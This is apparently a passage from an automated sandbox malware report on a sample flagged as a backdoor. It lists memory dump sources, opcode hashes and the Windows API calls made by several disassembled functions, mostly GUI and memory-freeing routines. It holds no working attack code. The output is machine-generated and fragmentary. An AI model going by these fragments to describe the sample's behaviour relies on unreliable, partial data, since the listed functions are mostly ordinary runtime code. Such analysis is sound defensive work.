                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID:
                                                • API String ID: 3519838083-0
                                                • Opcode ID: b4c63a3451d1771c4f33b30cfdac51b24b8d593511b9d3cd73b36c5aa48a4258
                                                • Instruction ID: 032e2af76776ca3d1bb24ecfb1b9e196b33ce9147ccd6a801ab1510270577cd6
                                                • Opcode Fuzzy Hash: b4c63a3451d1771c4f33b30cfdac51b24b8d593511b9d3cd73b36c5aa48a4258
                                                • Instruction Fuzzy Hash: AED119B1A053818FDB14CF2AC88475BBBE0BFA9348F04456DE8449B742D738E958CBD6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction ID: 0d2d11572142686eba42c6c0f00ab2d127c1be7b303a480a457677001dfd203d
                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                • Instruction Fuzzy Hash: E8C1A7362051970ADF2D4639893443FBBA16EA27B131A07ADD5B3CB3C6FF28D524D960
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f85e23e0a7e775e1abfe8f72565b1df93127fa14e748a0bfbc9b546d21718474
                                                • Instruction ID: 38f10c333fc836c286a969e857f4c9fbc69aca32c3113bff8a919a47fcfc68e0
                                                • Opcode Fuzzy Hash: f85e23e0a7e775e1abfe8f72565b1df93127fa14e748a0bfbc9b546d21718474
                                                • Instruction Fuzzy Hash: 56E125755083848FC304CF69D8909AABBF4BFCA300F89495EF5D587352D235EA19DBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                                                • Instruction ID: f84c4f4af143e64856fba9bda8e4fc9dd7aa3a04649cf87c7112d528550bdb4d
                                                • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                                                • Instruction Fuzzy Hash: 46916BB02057C59BD724EF69C898BBA73E5BB98300F10092EE597872C2EA7CD745C352
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7da2553fa0291bf85017f65d91c00134c6d8b837777fbf3c336a251d84629b4b
                                                • Instruction ID: 75d7bc66c8f38e3c4154a0d9c08369364e6c309a200490f5808bed902420f693
                                                • Opcode Fuzzy Hash: 7da2553fa0291bf85017f65d91c00134c6d8b837777fbf3c336a251d84629b4b
                                                • Instruction Fuzzy Hash: E961577178070D97DE38CA289899BBF23D4EB41700F144A1EE782DB382D69DED42D759
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                                • Instruction ID: 779c6c334630f02381318a3c612f13b260c3d64450d93bf4d28228e77db01483
                                                • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                                • Instruction Fuzzy Hash: 4B714F707053C59BDB24DE2AC8CDB7D77E1AB98304F00092DE5868B383DA7CDA858752
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                                                • Instruction ID: e2d25c112b4b33298d1dd58f935a5d00b817dbb3803c91e329975704a8a91da1
                                                • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                                                • Instruction Fuzzy Hash: FD516D71600A8CA7DB34A5688859BBF67C9AB53380F280509EB82D7382D71DED41D3B6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1aefa0253e78af5805f05565e63c182f6e3d55a531c52eff814271f0f4a60c0
                                                • Instruction ID: 1fd967c4f78587fabacc8c5b400b343790a522a52d7a2eedc7630b24a7f2176c
                                                • Opcode Fuzzy Hash: a1aefa0253e78af5805f05565e63c182f6e3d55a531c52eff814271f0f4a60c0
                                                • Instruction Fuzzy Hash: 6381908121D6D4AEC7165F7C38A42F53FB96F73341B2D80BAC4C686263D53A4A6CD722
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b21ed90600f441d250962a7d0465eaf80c15a081c6a4b0c81c9a173110be56d8
                                                • Instruction ID: f8ea130c46996cba5b85e2a907a7235e018b410bc31ffc121d82cc77a067831d
                                                • Opcode Fuzzy Hash: b21ed90600f441d250962a7d0465eaf80c15a081c6a4b0c81c9a173110be56d8
                                                • Instruction Fuzzy Hash: 0E51EF705093D28FC712EF2491944AEBFF4BEDA314F59489EE4D55B302D224E64ACBA3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2df7f18b482246b04effe4b8a547aac38d68ca1ae5bb8d339096a60e688beadb
                                                • Instruction ID: 58955a58163b408b75e8e99efe4c588a8528b14f988430100b50102275967e2e
                                                • Opcode Fuzzy Hash: 2df7f18b482246b04effe4b8a547aac38d68ca1ae5bb8d339096a60e688beadb
                                                • Instruction Fuzzy Hash: 4A514671A083018BC748CF19D49055AF7E1FFC8354F058A2EE889E7741DB34E959CB96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                                • Instruction ID: 1ccd67c15a5e41c2abe0f1572581b6401136571bc74deb663562971b739d4503
                                                • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                                • Instruction Fuzzy Hash: 2E31F4B16047469FCB14DF29C89526ABBE0FB99310F10492EE4D5C7342C73DEA59CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 020fe20e910f80f791d11416be98be802f39d851a0c017f7a08b23bc7de0732d
                                                • Instruction ID: 60cd8eb7cd551d06f66a3293f8ca5416f1b40d01d779db3bd955e2f55a110d9a
                                                • Opcode Fuzzy Hash: 020fe20e910f80f791d11416be98be802f39d851a0c017f7a08b23bc7de0732d
                                                • Instruction Fuzzy Hash: 0621A772A201754BCB98CF2DDC9087B7765BB86311746C22BFA46CB3D1C539E925CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _swprintf.LIBCMT ref: 007DDABE
                                                  • Part of subcall function 007D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D401D
                                                  • Part of subcall function 007E1596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00810EE8,00000200,007DD202,00000000,?,00000050,00810EE8), ref: 007E15B3
                                                • _strlen.LIBCMT ref: 007DDADF
                                                • SetDlgItemTextW.USER32(?,0080E154,?), ref: 007DDB3F
                                                • GetWindowRect.USER32(?,?), ref: 007DDB79
                                                • GetClientRect.USER32(?,?), ref: 007DDB85
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007DDC25
                                                • GetWindowRect.USER32(?,?), ref: 007DDC52
                                                • SetWindowTextW.USER32(?,?), ref: 007DDC95
                                                • GetSystemMetrics.USER32(00000008), ref: 007DDC9D
                                                • GetWindow.USER32(?,00000005), ref: 007DDCA8
                                                • GetWindowRect.USER32(00000000,?), ref: 007DDCD5
                                                • GetWindow.USER32(00000000,00000002), ref: 007DDD47
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                • String ID: $%s:$CAPTION$d
                                                • API String ID: 2407758923-2512411981
                                                • Opcode ID: b55c0e5d04fd55aa160a70d80f57dc7539e7084a80783a4de969b8025828b568
                                                • Instruction ID: 1751fb9c79fa884e8555d06ff92a846a22bef799c08e2489b21e8d20d8da6b2c
                                                • Opcode Fuzzy Hash: b55c0e5d04fd55aa160a70d80f57dc7539e7084a80783a4de969b8025828b568
                                                • Instruction Fuzzy Hash: 02816D71208305AFD720DF68CD89A6FBBF9FBC9704F04091EFA8493291D674E9098B52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 007FC277
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE2F
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE41
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE53
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE65
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE77
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE89
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBE9B
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBEAD
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBEBF
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBED1
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBEE3
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBEF5
                                                  • Part of subcall function 007FBE12: _free.LIBCMT ref: 007FBF07
                                                • _free.LIBCMT ref: 007FC26C
                                                  • Part of subcall function 007F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?), ref: 007F84F4
                                                  • Part of subcall function 007F84DE: GetLastError.KERNEL32(?,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?,?), ref: 007F8506
                                                • _free.LIBCMT ref: 007FC28E
                                                • _free.LIBCMT ref: 007FC2A3
                                                • _free.LIBCMT ref: 007FC2AE
                                                • _free.LIBCMT ref: 007FC2D0
                                                • _free.LIBCMT ref: 007FC2E3
                                                • _free.LIBCMT ref: 007FC2F1
                                                • _free.LIBCMT ref: 007FC2FC
                                                • _free.LIBCMT ref: 007FC334
                                                • _free.LIBCMT ref: 007FC33B
                                                • _free.LIBCMT ref: 007FC358
                                                • _free.LIBCMT ref: 007FC370
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: 0753791832cd7a6bb7d4544b4ec52df9c13feb636abca3a11aa25f6e01d50aca
                                                • Instruction ID: ee12a100e99c2a2827d7ee34f8d27bbf4ce11bb9449d0528ebae135a96891120
                                                • Opcode Fuzzy Hash: 0753791832cd7a6bb7d4544b4ec52df9c13feb636abca3a11aa25f6e01d50aca
                                                • Instruction Fuzzy Hash: 30315E3250420DDFEB62AF78DA49B7673E9FF00350F148429E649D7751DF39AC409A52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetWindow.USER32(?,00000005), ref: 007ECD51
                                                • GetClassNameW.USER32(00000000,?,00000800), ref: 007ECD7D
                                                  • Part of subcall function 007E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,007DBB05,00000000,.exe,?,?,00000800,?,?,007E85DF,?), ref: 007E17C2
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 007ECD99
                                                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 007ECDB0
                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 007ECDC4
                                                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 007ECDED
                                                • DeleteObject.GDI32(00000000), ref: 007ECDF4
                                                • GetWindow.USER32(00000000,00000002), ref: 007ECDFD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                • String ID: STATIC
                                                • API String ID: 3820355801-1882779555
                                                • Opcode ID: 7c1aa05bcbe15d413a9ad60b3b79bc55a558dadbbd96db08a7d6fc9201b56d07
                                                • Instruction ID: b7cd4d254d155403f071642d010337477f12474269508897cc4261bba18d2761
                                                • Opcode Fuzzy Hash: 7c1aa05bcbe15d413a9ad60b3b79bc55a558dadbbd96db08a7d6fc9201b56d07
                                                • Instruction Fuzzy Hash: 7C11EB366427A1BBE721AB619C0DF9F365CFB99741F004820FB41A1092CA688D1686A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 007F8EC5
                                                  • Part of subcall function 007F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?), ref: 007F84F4
